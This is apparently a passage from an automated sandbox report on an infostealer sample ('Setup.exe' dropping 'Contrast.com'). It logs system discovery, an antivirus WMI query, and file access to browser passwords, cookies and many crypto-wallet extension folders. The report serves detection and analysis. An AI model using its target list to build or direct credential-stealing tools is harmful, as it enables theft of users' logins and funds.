            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00550030 GetLocalTime,__swprintf,10_2_00550030
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00550722 GetUserNameW,10_2_00550722
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0054416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_0054416A
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0`
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ctrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wal
            Source: Contrast.com, 0000000A.00000003.2635862336.0000000004546000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -store.json",".finger-print.fp","simple-storage.json","window-state.jsonB
            Source: Contrast.com, 0000000A.00000003.2635862336.0000000004546000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: flelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum",
            Source: Contrast.com, 0000000A.00000003.2635862336.0000000004546000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: powershell.exe, 0000000E.00000002.2860084189.0000000007090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
